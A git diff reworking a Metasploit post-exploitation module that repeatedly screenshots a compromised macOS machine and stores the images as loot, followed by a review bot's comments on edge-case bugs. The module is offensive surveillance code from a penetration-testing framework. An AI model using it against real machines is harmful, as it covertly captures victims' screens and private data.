Modified module to use windows/screen_spy code
parent
3fdaf4de94
commit
92da6760ef
|
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Post
|
||||||
[true, 'File format to use when saving a snapshot', 'png', %w(png gif)]
|
[true, 'File format to use when saving a snapshot', 'png', %w(png gif)]
|
||||||
),
|
),
|
||||||
OptInt.new('DELAY', [true, 'Interval between screenshots in seconds. 0 for no delay', 10]),
|
OptInt.new('DELAY', [true, 'Interval between screenshots in seconds. 0 for no delay', 10]),
|
||||||
OptInt.new('COUNT', [true, 'Number of screenshots to collect. 0 for no count', 1]),
|
OptInt.new('COUNT', [true, 'Number of screenshots to collect.', 1]),
|
||||||
OptString.new('TMP_PATH', [true, 'Path to remote temp directory', '/tmp/random']),
|
OptString.new('TMP_PATH', [true, 'Path to remote temp directory', '/tmp/random']),
|
||||||
OptString.new('EXE_PATH', [true, 'Path to remote screencapture executable', '/usr/sbin/screencapture'])
|
OptString.new('EXE_PATH', [true, 'Path to remote screencapture executable', '/usr/sbin/screencapture'])
|
||||||
], self.class)
|
], self.class)
|
||||||
|
@ -40,71 +40,43 @@ class Metasploit3 < Msf::Post
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def run
|
||||||
|
host = session.session_host
|
||||||
|
screenshot = Msf::Config.get_config_root + "/logs/" + host + ".jpg"
|
||||||
|
file_type = datastore['FILETYPE'].shellescape
|
||||||
tmp_path = datastore['TMP_PATH'].shellescape.gsub('random', Rex::Text.rand_text_alpha(8))
|
tmp_path = datastore['TMP_PATH'].shellescape.gsub('random', Rex::Text.rand_text_alpha(8))
|
||||||
execute("Create remote temp dir: ", "mkdir -p #{tmp_path}")
|
|
||||||
if datastore['COUNT'] == nil
|
begin
|
||||||
count = 1
|
|
||||||
else
|
|
||||||
count = datastore['COUNT']
|
count = datastore['COUNT']
|
||||||
end
|
|
||||||
if count == 0
|
|
||||||
begin
|
|
||||||
get_screenshot("Screenshot", tmp_path, "screenshot.#{datastore['FILETYPE'].shellescape}")
|
|
||||||
delay
|
|
||||||
end until false
|
|
||||||
else
|
|
||||||
print_status "Capturing #{count} screenshots with a delay of #{datastore['DELAY']} seconds"
|
print_status "Capturing #{count} screenshots with a delay of #{datastore['DELAY']} seconds"
|
||||||
# calculate a sane number of leading zeros to use. log of x is ~ the number of digits
|
# calculate a sane number of leading zeros to use. log of x is ~ the number of digits
|
||||||
leading_zeros = Math::log10(count).round
|
leading_zeros = Math::log10(count).round
|
||||||
|
file_locations = []
|
||||||
count.times do |num|
|
count.times do |num|
|
||||||
if count == 1
|
select(nil, nil, nil, datastore['DELAY'])
|
||||||
msg = "Screenshot"
|
begin
|
||||||
else
|
# This is an OSX module, so mkdir -p should be fine
|
||||||
msg = "Screenshot %0#{leading_zeros}d/#{count}" % (num+1)
|
cmd_exec("mkdir -p #{tmp_path}")
|
||||||
|
filename = Rex::Text.rand_text_alpha(7)
|
||||||
|
file = tmp_path + "/" + filename
|
||||||
|
cmd_exec(datastore['EXE_PATH'].shellescape + " -C -t " + datastore['FILETYPE'].shellescape + " " + file)
|
||||||
|
data = read_file(file)
|
||||||
|
rescue RequestError => e
|
||||||
|
print_error("Error taking the screenshot: #{e.class} #{e} #{e.backtrace}")
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
if data
|
||||||
|
# let's loot it using non-clobbering filename, even tho this is the source filename, not dest
|
||||||
|
fn = "screenshot.%0#{leading_zeros}d.#{file_type}" % num
|
||||||
|
file_locations << store_loot("screen_capture.screenshot", "image/#{file_type}", session, data, fn, "Screenshot")
|
||||||
end
|
end
|
||||||
get_screenshot(msg, tmp_path, "screenshot_%0#{leading_zeros}d.#{datastore['FILETYPE'].shellescape}" % (num+1))
|
|
||||||
delay unless ((num+1) == count)
|
|
||||||
end
|
end
|
||||||
rescue IOError, Errno::ENOENT => e
|
rescue IOError, Errno::ENOENT => e
|
||||||
print_error("Error storing screenshot: #{e.class} #{e} #{e.backtrace}")
|
print_error("Error storing screenshot: #{e.class} #{e} #{e.backtrace}")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
execute("Remove remote temp dir: ", "rmdir " + tmp_path)
|
print_status("Screen Capturing Complete")
|
||||||
end
|
if file_locations and not file_locations.empty?
|
||||||
|
print_status "run loot -t screen_capture.screenshot to see file locations of your newly acquired loot"
|
||||||
def get_screenshot(msg, tmp_path, local_filename)
|
|
||||||
filename = Rex::Text.rand_text_alpha(7) + "." + datastore['FILETYPE'].shellescape
|
|
||||||
file = tmp_path + "/" + filename
|
|
||||||
|
|
||||||
execute("Save screenshot to remote temp folder:", datastore['EXE_PATH'].shellescape + " -C -t " + datastore['FILETYPE'].shellescape + " " + file)
|
|
||||||
data = cat_file(file)
|
|
||||||
loot_file = save(msg, data, local_filename)
|
|
||||||
execute("Remove remote temp file:", "rm " + file)
|
|
||||||
end
|
|
||||||
|
|
||||||
def delay
|
|
||||||
if datastore['DELAY'] != nil && datastore['DELAY'] != 0
|
|
||||||
vprint_status("Delaying for " + datastore['DELAY'].to_s() + " seconds")
|
|
||||||
Rex.sleep(datastore['DELAY'])
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def save(msg, data, filename, ctype="image/" + datastore['FILETYPE'])
|
|
||||||
ltype = "osx.screenshot"
|
|
||||||
loot_file = store_loot(ltype, ctype, session, data, filename, 'Screenshot')
|
|
||||||
print_good("#{msg} stored in #{loot_file.to_s}")
|
|
||||||
end
|
|
||||||
|
|
||||||
def execute(msg, cmd)
|
|
||||||
vprint_status("#{msg} #{cmd}")
|
|
||||||
output = cmd_exec(cmd)
|
|
||||||
return output
|
|
||||||
end
|
|
||||||
|
|
||||||
def cat_file(filename)
|
|
||||||
vprint_status("Downloading screenshot: #{filename}")
|
|
||||||
data = read_file(filename)
|
|
||||||
return data
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
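Review bot: `run` no longer guards `COUNT` before `leading_zeros = Math::log10(count).round`, so a value of 0 makes `log10` return -Infinity and `.round` raise `FloatDomainError`, while a negative value raises `Math::DomainError`; neither is caught by the `rescue IOError, Errno::ENOENT` clause. The option text dropped "0 for no count", but nothing visible rejects 0, so add a check right after `count = datastore['COUNT']`, for example `if count < 1`, `print_error("COUNT must be at least 1")`, `return`. The locals `host` and `screenshot` at the top of `run` are assigned but never read in the new code shown here and can be dropped. Separately, `select(nil, nil, nil, datastore['DELAY'])` now waits before the first capture as well, whereas the removed `delay` helper used `Rex.sleep` only between captures; if that change is intended, a short comment saying so would help.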